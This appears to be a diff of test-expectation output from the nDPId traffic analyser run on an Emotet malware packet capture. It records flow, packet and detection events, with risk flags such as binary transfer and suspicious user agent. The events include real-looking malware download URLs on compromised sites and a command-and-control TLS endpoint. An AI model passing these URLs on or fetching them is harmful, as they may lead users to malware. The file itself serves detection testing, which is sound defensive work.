00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648563468993,"flow_last_seen":1648563468993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648563468993,"l3_proto":"ip4","src_ip":"10.3.29.101","dst_ip":"104.161.127.22","src_port":56309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1648563468993,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648563468993,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0EddAAIAG2c0KAx1laKF\/Ftv1AFBvd7IvAAAAAIAC+vBnEwAAAgQFtAEDAwgBAQQC"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1648563469109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1648563469109,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsoCoAAIAGi4JooX8WCgMdZQBQ2\/UuAEklb3eyMGAS+vAY8wAAAgQFtA=="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1648563469109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1648563469109,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoEdhAAIAG2dgKAx1laKF\/Ftv1AFBvd7IwLgBJJlAQ+vAwsAAA"} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648563468993,"flow_last_seen":1648563469109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1648563469109,"l3_proto":"ip4","src_ip":"10.3.29.101","dst_ip":"104.161.127.22","src_port":56309,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"fkl.co.ke","url":"fkl.co.ke\/wp-content\/Elw3kPvOsZxM5\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.74 Safari\/537.36 Edg\/99.0.1150.55"}} -00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":831,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":626,"flow_first_seen":1645830066121,"flow_last_seen":1645830085160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":404645,"flow_avg_l4_payload_len":646,"midstream":0,"thread_ts_msec":1648563473087,"l3_proto":"ip4","src_ip":"10.2.25.102","dst_ip":"193.252.22.84","src_port":57309,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"}} -00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":835,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":835,"packets-processed":834,"total-skipped-flows":0,"total-l4-payload-len":582320,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1650490398530} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648563468993,"flow_last_seen":1648563469109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1648563469109,"l3_proto":"ip4","src_ip":"10.3.29.101","dst_ip":"104.161.127.22","src_port":56309,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"fkl.co.ke","url":"fkl.co.ke\/wp-content\/Elw3kPvOsZxM5\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.74 Safari\/537.36 Edg\/99.0.1150.55"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":831,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":626,"flow_first_seen":1645830066121,"flow_last_seen":1645830085160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":404645,"flow_avg_l4_payload_len":646,"midstream":0,"thread_ts_msec":1648563473087,"l3_proto":"ip4","src_ip":"10.2.25.102","dst_ip":"193.252.22.84","src_port":57309,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"}} +00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":835,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":835,"packets-processed":834,"total-skipped-flows":0,"total-l4-payload-len":582320,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1650490398530} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":835,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650490398530,"flow_last_seen":1650490398530,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1650490398530,"l3_proto":"ip4","src_ip":"10.4.20.102","dst_ip":"107.161.178.210","src_port":54319,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":835,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1650490398530,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650490398530,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0\/mJAAIAGv4MKBBRma6Gy0tQvAFBRzVZmAAAAAIAC\/\/+1fwAAAgQFtAEDAwgBAQQC"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1650490398627,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1650490398627,"pkt":"AAgCHEeuIOUqtpPxCABFAAAwAABAADIGC+trobLSCgQUZgBQ1C8M9mn7Uc1WZ3ASchDhvAAAAgQFbAEDAwc="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1650490398628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1650490398628,"pkt":"IOUqtpPxAAgCHEeuCABFAAAo\/mNAAIAGv44KBBRma6Gy0tQvAFBRzVZnDPZp\/FAQBAB7UAAAAAAAAAAA"} -00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":838,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650490398530,"flow_last_seen":1650490398628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":225,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1650490398628,"l3_proto":"ip4","src_ip":"10.4.20.102","dst_ip":"107.161.178.210","src_port":54319,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"gandhitoday.org","url":"gandhitoday.org\/video\/6JvA8\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}} -00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":839,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1650490398530,"flow_last_seen":1650490398888,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1650490398888,"l3_proto":"ip4","src_ip":"10.4.20.102","dst_ip":"107.161.178.210","src_port":54319,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"gandhitoday.org","url":"gandhitoday.org\/video\/6JvA8\/","code":200,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1664,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":208,"flow_first_seen":1648563468993,"flow_last_seen":1648563480808,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1361,"flow_tot_l4_payload_len":177675,"flow_avg_l4_payload_len":854,"midstream":0,"thread_ts_msec":1650490407650,"l3_proto":"ip4","src_ip":"10.3.29.101","dst_ip":"104.161.127.22","src_port":56309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1664,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":1664,"packets-processed":1663,"total-skipped-flows":0,"total-l4-payload-len":1352571,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1650905413858} +00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":838,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650490398530,"flow_last_seen":1650490398628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":225,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1650490398628,"l3_proto":"ip4","src_ip":"10.4.20.102","dst_ip":"107.161.178.210","src_port":54319,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"gandhitoday.org","url":"gandhitoday.org\/video\/6JvA8\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}} +00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":839,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1650490398530,"flow_last_seen":1650490398888,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1650490398888,"l3_proto":"ip4","src_ip":"10.4.20.102","dst_ip":"107.161.178.210","src_port":54319,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"gandhitoday.org","url":"gandhitoday.org\/video\/6JvA8\/","code":200,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1664,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":208,"flow_first_seen":1648563468993,"flow_last_seen":1648563480808,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1361,"flow_tot_l4_payload_len":177675,"flow_avg_l4_payload_len":854,"midstream":0,"thread_ts_msec":1650490407650,"l3_proto":"ip4","src_ip":"10.3.29.101","dst_ip":"104.161.127.22","src_port":56309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1664,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":1664,"packets-processed":1663,"total-skipped-flows":0,"total-l4-payload-len":1352571,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1650905413858} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650905413858,"flow_last_seen":1650905413858,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1650905413858,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"77.105.36.156","src_port":49797,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1650905413858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650905413858,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0LKVAAIAGOLEKBBllTWkknMKFAFDxFWwgAAAAAIAC+vC+pQAAAgQFtAEDAwgBAQQC"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1665,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1650905414042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650905414042,"pkt":"AAgCHEeuIOUqtpPxCABFAAA0AABAADEGtFZNaSScCgQZZQBQwoUpbDcH8RVsIYASOQggUwAAAgQFbAEBBAIBAwMH"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1650905414043,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1650905414043,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoLKZAAIAGOLwKBBllTWkknMKFAFDxFWwhKWw3CFAQAgOX4gAAAAAAAAAA"} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1667,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650905413858,"flow_last_seen":1650905414043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1650905414043,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"77.105.36.156","src_port":49797,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"filmmogzivota.rs","url":"filmmogzivota.rs\/SpryAssets\/gDR\/","code":0,"content_type":"","user_agent":"vBKbaQgjyvRRbcgfvlsc"}} -01062{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1669,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1650905413858,"flow_last_seen":1650905414335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":572,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1650905414335,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"77.105.36.156","src_port":49797,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"filmmogzivota.rs","url":"filmmogzivota.rs\/SpryAssets\/gDR\/","code":200,"content_type":"application\/x-msdownload","user_agent":"vBKbaQgjyvRRbcgfvlsc"}} -00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2228,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":829,"flow_first_seen":1650490398530,"flow_last_seen":1650490407650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":770251,"flow_avg_l4_payload_len":929,"midstream":0,"thread_ts_msec":1650905415845,"l3_proto":"ip4","src_ip":"10.4.20.102","dst_ip":"107.161.178.210","src_port":54319,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1667,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650905413858,"flow_last_seen":1650905414043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1650905414043,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"77.105.36.156","src_port":49797,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"filmmogzivota.rs","url":"filmmogzivota.rs\/SpryAssets\/gDR\/","code":0,"content_type":"","user_agent":"vBKbaQgjyvRRbcgfvlsc"}} +01062{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1669,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1650905413858,"flow_last_seen":1650905414335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":572,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1650905414335,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"77.105.36.156","src_port":49797,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"filmmogzivota.rs","url":"filmmogzivota.rs\/SpryAssets\/gDR\/","code":200,"content_type":"application\/x-msdownload","user_agent":"vBKbaQgjyvRRbcgfvlsc"}} +00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2228,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":829,"flow_first_seen":1650490398530,"flow_last_seen":1650490407650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":770251,"flow_avg_l4_payload_len":929,"midstream":0,"thread_ts_msec":1650905415845,"l3_proto":"ip4","src_ip":"10.4.20.102","dst_ip":"107.161.178.210","src_port":54319,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2228,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650905467542,"flow_last_seen":1650905467542,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1650905467542,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49803,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2228,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1650905467542,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650905467542,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0C55AAIAGrZIKBBllisWTZcKLAbv3Q1KhAAAAAIAC\/\/8fUQAAAgQFtAEDAwgBAQQC"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2229,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1650905467652,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650905467652,"pkt":"AAgCHEeuIOUqtpPxCABFAAA0AABAADAGCTGKxZNlCgQZZQG7wotH+MA690NSooAS+vAcZQAAAgQFbAEBBAIBAwMH"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2230,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1650905467652,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1650905467652,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoC59AAIAGrZ0KBBllisWTZcKLAbv3Q1KiR\/jAO1AQBABT4AAAAAAAAAAA"} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2231,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650905467542,"flow_last_seen":1650905467666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1650905467666,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49803,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01468{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2233,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1650905467542,"flow_last_seen":1650905467789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1378,"flow_tot_l4_payload_len":1527,"flow_avg_l4_payload_len":254,"midstream":0,"thread_ts_msec":1650905467789,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49803,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"ec74a5c51106f0419184d0dd08fb05bc","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com","subjectDN":"C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com","fingerprint":"43:A2:39:73:AC:4D:2C:15:7B:D6:4E:32:EA:22:11:B7:97:65:1A:93"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2231,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650905467542,"flow_last_seen":1650905467666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1650905467666,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49803,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 